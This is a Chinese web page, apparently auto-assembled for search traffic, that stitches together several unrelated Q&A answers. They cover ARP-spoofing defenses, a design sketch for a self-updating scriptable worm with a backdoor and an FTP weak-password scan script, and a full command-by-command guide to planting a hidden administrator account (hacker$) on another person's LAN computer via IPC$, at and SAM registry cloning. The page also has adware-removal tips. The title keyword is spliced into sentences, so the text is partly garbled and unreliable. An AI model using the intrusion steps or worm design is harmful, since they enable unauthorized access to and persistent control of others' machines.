置顶

电脑怎么编辑攻击软件_电脑攻击方式

作者:hacker | 分类:渗透破解 | 浏览:131 | 日期:2022年07月14日

文章目录:

电脑怎么设置才可以拦截ARP的攻击?怎么拦截类似P2P软件的攻击?

360安全卫士里面的ARP防火墙通过在系统内核层拦截ARP攻击数据包,确保网关正确的MAC地址不被篡改,可以保障数据流向正确,不经过第三者,从而保证通讯数据安全、保证网络畅通、保证通讯数据不受第三者控制,完美的解决局域网内ARP攻击问题。 1、捆绑MAC和IP地址

杜绝IP地址盗用现象。如果是通过代理服务器上网:到代理服务器端让网络管理员把上网的静态IP地址与所记录计算机的网卡地址进行捆绑。如:ARP-s192.16.10.400-EO-4C-6C-08-75。这样,就将上网的静态IP地址192.16.10.4与网卡地址为00-EO-4C-6C-08-75的计算机绑定在一起了,即使别人盗用您的IP地址,也无法通过代理服务器上网。如果是通过交换机连接,可以将计算机的IP地址、网卡的MAC地址以及交换机端口绑定。

2、修改MAC地址,欺骗ARP欺骗技术

就是假冒MAC地址,所以最稳妥的一个办法就是修改机器的MAC地址,只要把MAC地址改为别的,就可以欺骗过ARP欺骗,从而达到突破封锁的目的。

3、使用ARP服务器

使用ARP服务器。通过该服务器查找自己的ARP转换表来响应其他机器的ARP广播。确保这台ARP服务器不被攻击。

4、交换机端口设置

(1)端口保护(类似于端口隔离):ARP欺骗技术需要交换机的两个端口直接通讯,端口设为保护端口即可简单方便地隔离用户之间信息互通,不必占用VLAN资源。同一个交换机的两个端口之间不能进行直接通讯,需要通过转发才能相互通讯。

(2)数据过滤:如果需要对报文做更进一步的控制用户可以采用ACL(访问控制列表)。ACL利用IP地址、TCP/UDP端口等对进出交换机的报文进行过滤,根据预设条件,对报文做出允许转发或阻塞的决定。华为和Cisco的交换机均支持IPACL和MACACL,每种ACL分别支持标准格式和扩展格式。标准格式的ACL根据源地址和上层协议类型进行过滤,扩展格式的ACL根据源地址、目的地址以及上层协议类型进行过滤,异词检查伪装MAC地址的帧。

5、禁止网络接口做ARP解析

在相对系统中禁止某个网络接口做ARP解析(对抗ARP欺骗攻击),可以做静态ARP协议设置(因为对方不会响应ARP请求报义)如:ARP–sXXX.XXX.XX.X08-00-20-a8-2e-ac在很多操作系统中如:Unix,NT等,都可以结合“禁止相应网络接口做ARP解析”和“使用静态ARP表”的设置来对抗ARP欺骗攻击。而Linux系统,其静态ARP表项不会被动态刷新,所以不需要“禁止相应网络接口做ARP解析”,即可对抗ARP欺骗攻击。

6、使用硬件屏蔽主机

设置好你的路由,确保IP地址能到达合法的路径。(静态配置路由ARP条目),注意,使用交换集线器和网桥无法阻止ARP欺骗。

7、定期检查ARP缓存

管理员定期用响应的IP包中获得一个rarp请求,然后检查ARP响应的真实性。定期轮询,检查主机上的ARP缓存。使用防火墙连续监控网络。注意有使用SNMP的情况下,ARP的欺骗有可能导致陷阱包丢失。

技巧一则

绑定MAC地址的方法个人认为是不实用的,首先,这样做会加大网络管理员的工作量,试想,如果校园网内有3000个用户,网络管理员就必须做3000次端口绑定MAC地址的操作,甚至更多。其次,网络管理员应该比较清楚的是,由于网络构建成本的原因,接入层交换机的性能是相对较弱的,功能也相对单一一些,对于让接入层交换机做地址绑定的工作,对于交换机性能的影响相当大,从而影响网络数据的传输。

建议用户采用绑定网关地址的方法解决并且防止ARP欺骗。

1)首先,获得安全网关的内网的MAC地址。(以windowsXP为例)点击"开始"→"运行",在打开中输入cmd。点击确定后将出现相关网络状态及连接信息,然后在其中输入ipconfig/all,然后继续输入arp-a可以查看网关的MAC地址。

2)编写一个批处理文件rarp.bat(文件名可以任意)内容如下:

@echooff

arp-d

arp-s192.168.200.100-aa-00-62-c6-09

将文件中的网关IP地址和MAC地址更改为实际使用的网关IP地址和MAC地址即可。

3)编写完以后,点击"文件"→"另存为"。注意文件名一定要是*.bat如arp.bat保存类型注意要选择所有类型。点击保存就可以了。最后删除之前创建的"新建文本文档"就可以。

4)将这个批处理软件拖到"windows--开始--程序--启动"中,(一般在系统中的文件夹路径为C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启动)。

5)最后重新启动一下电脑就可以。

静态ARP表能忽略执行欺骗行为的ARP应答,我们采用这样的方式可以杜绝本机受到ARP欺骗包的影响。对于解决ARP欺骗的问题还有多种方法:比如通过专门的防ARP的软件,或是通过交换机做用户的入侵检测。前者也是个针对ARP欺骗的不错的解决方案,但是软件的设置过程并不比设置静态ARP表简单。后者对接入层交换机要求太高,如果交换机的性能指标不是太高,会造成比较严重的网络延迟,接入层交换机的性能达到了要求,又会使网络安装的成本提高。

在应对ARP攻击的时候,除了利用上述的各种技术手段,还应该注意不要把网络安全信任关系建立在IP基础上或MAC基础上,最好设置静态的MAC-IP对应表,不要让主机刷新你设定好的转换表,除非很有必要,否则停止使用ARP,将ARP做为永久条目保存在对应表中。

强烈建议:养成良好的上网习惯,不上陌生网站,不上不良网站,不接受陌生人发来的连接或者文件,不乱下载东西,如下载,下载后首先对其查杀是否含有病毒或木马!

及时修复系统漏洞,不让病毒有可趁之机。。

安装360安全卫士,对流氓软件以及恶意插件进行清除。

安装杀毒软件并及时升级。

这样很大程度上降低了感染病毒的风险。

木马怎么编辑?

一个典型的蠕虫病毒有两个功能型部件电脑怎么编辑攻击软件:传播和破坏电脑怎么编辑攻击软件,流行的蠕虫病毒大都是利用操作系统或者应用程序的漏洞(以弱口令和溢出最为常见),但常常并不会对宿主机造成“致命”的破坏。这两个特点使蠕虫病毒比普通电脑病毒传播得更快,影响力更大。一般来说,单一的蠕虫病毒只针对某种特定的漏洞进行攻击,所以一旦这种漏洞得到大范围修补,病毒也就没有电脑怎么编辑攻击软件了生存空间。

更新这种设计,电脑怎么编辑攻击软件我把传播部件拆分开来:把扫描、攻击和破坏脚本化,主程序则负责解析这些脚本。例如针对ftp弱口令进行扫描,我们可以定义如下脚本:

code:

uid = iscript-0a21-2331-x #随机唯一编号

using tcp;

port 21;

send “user anonymous”;

send crlf;

send “pass fake@nothing.com”

send crlf;

if (find “200”) resulrt ok;

next;

[copy to clipboard]

解析了这段脚本后(我想这种脚本是很容易读懂的),我们再定义一系列的过程,把我们的蠕虫体upload上去,一次完整的传播动作就完成了。如果是溢出漏洞,为了简单起见我们可以采集远程溢出的数据包,然后修改ip地址等必要数据,再转发溢出数据包进行溢出(这种情况下要实现connect-back就不容易了,不过这些具体问题就待有心人去研究吧),例如:

code:

using raw;

ip offset at 12;

send “\x1a\xb2\xcc” ……

[copy to clipboard]d

主程序在完成传播后留下一个后门,其他宿主机可以通过这个后门与本地的蠕虫病毒同步传播脚本,这样每次有新的漏洞产生,宿主机的传播方式可以很快地得到升级。我们当然不会仅满足于这样一个蠕虫程序,扫描/攻击脚本的传播过程也是需要仔细处理的。

我们希望适应力(fitness)最强的脚本得到广泛的应用(看起来有点类似 蚁群算法和 ga),所以我们要求得每个个体的fitness,当它和另一个体取得联系的时候就可以决定谁的传播脚本将取代另一个:

fitness = number of host infected / number of host scanned

但也不能仅凭fitness就修改传播脚本,我个人觉得一个合适的概率是75%,20%的机会保持各自的传播脚本,剩下的5%则交换脚本。这样在维持每种脚本都有一定生存空间的情况下使适应性最好的个体得到更多的传播机会,同时,一些在某种网络环境下适应性不强的脚本也有机会尝试不同的网络环境

谁知道怎样在局域网攻击别人电脑,或者有什么好的软件介绍个!

我可以告诉你一个办法不过需要对象的用户名和口令,还要知道他的IP

地址,只要你知道拿到账号和密码半个小时就可以搞定,以后你就有一个自己的隐藏管理员账户,随便进入他的电脑。

在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。

对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。

1.这里先假设他的用户名为administrator,密码为12345678,现在我们开始在命令行下远程为它建立隐藏的超级用户。(假设主机是局域网内的一台主机,ip地址为13.50.97.238,。)

2.先与他建立连接:

net

use

\\13.50.97.238\ipc$

"12345678"

/user:"Administrator”

3.用at命令在他的电脑建立一个用户(如果at服务没有启动,可用netsvc.exe或sc.exe来远程启动):

at

\\13.50.97.238

12:51

c:\windows\system32\net.exe

user

hacker$

1234

/add

建立这个加有$符的用户名,是因为加有$符后,命令行下用net

user将不显示这个用户,但在帐户管理器却能看到这个用户。

4.同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:

at

\\13.50.97.238

12:55

c:\windows\regedit.exe

/e

hacker.reg

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users

/e

是regedit.exe的参数,在这里HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users这个键的一定不要以“\“结尾。必要的情况下可以用引号将"c:\windows\regedit.exe

/e

hacker.reg

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users"引起来。

5.将他的电脑上的hacker.reg下载到本机上用记事本打开进行编辑命令为:

Copy

\\13.50.97.238\admin$\system32\hacker.reg

c:\hacker.reg

6.再将编辑好的hacker.reg拷回他的电脑上

copy

c:\hacker.reg

\\13.50.97.238\admin$\system32\hacker1.reg

7.查看他的电脑时间:net

time

\\13.50.97.238然后用at命令将用户hacker$删除:

at

\\13.50.97.238

13:40

net

user

hacker$

/del

8.验证hacker$是否删除:net

use

\\13.50.97.238

/del

断开与他的电脑连接。

再用net

use

\\13.50.97.238\ipc$

"1234"

/user:"hacker$"

用帐户hacker$与他电脑连接,不能连接说明已删除。

9.再与他电脑建立连接:

net

use

\\13.50.97.238\ipc$

"12345678"

/user:"administrator"

再取得他的时间,用at命令将拷回他的hacker1.reg导入他的注册表:

at

\\13.50.97.238

13:41

c:\windows\regedit.exe

/s

hacker1.reg

regedit.exe的参数/s是指安静模式。

10.再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。

11.再验证用户hacker$是否有读、写、删除的权限,如果不放心,你还可验证是否能建立其它帐户。

12.通过步骤11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删除的权限。

OK

以后你可以随意拿你的账号进入他电脑里游荡了~~~~~~~~~~~~~~~

请大家帮帮忙,我的电脑给流氓软件攻击了

用工具删不了

那就用手动删除啊

(最好是在安全模式下)进注册表把相关的键值删除了,会用注册表吗 ?为了保障安全(在此之前备份注册表)

在HKEY_LOCAL_MACHINE\SOFTWARE 和 HKEY_CURRENT_MACHINE\SOFTWARE

下会有他们的注册项的,都删除了,并且点编辑--查找--把相关的(用流氓软件的EXE文件名字搜)都查出来删除.

然后到windows下把整个文件夹删除了.

还有就是开始菜单--运行--输入msconfig

顺便做个优化(如果你不认识该流氓软件的服务名和启动名那么就听我的,把必须要的留下,其他一律关掉)

先是服务,首先点隐藏microsoft服务,只要保留杀毒软件的更新程序即可其他禁用

再是启动,只须保留杀毒软件和输入法(ctfmon.exe),其他禁用.

以上方法虽然可能并不能完全删尽流氓软件,但至少他不会烦你了.(他都崩溃掉啦)

还有推荐你用ewido4,查查.效果非常好的

发表评论

访客 游客 2022-07-14 · 回复该评论
0.97.23813:41c:\windows\regedit.exe/shacker1.regregedit.exe的参数/s是指安静模式。10.再验证hacker$是否已建立,

访客 游客 2022-07-14 · 回复该评论
点使蠕虫病毒比普通电脑病毒传播得更快,影响力更大。一般来说,单一的蠕虫病毒只针对某种特定的漏洞进行攻击,所以一旦这种漏洞得到大范围修补,病毒也就没有电脑怎么编辑攻击软件了生存空间。更新这种设计,电脑怎么编辑攻击软件我把传播部件拆分开来:把扫描、攻击和破坏脚本化,主程序则负责解析这

取消
微信二维码
支付宝二维码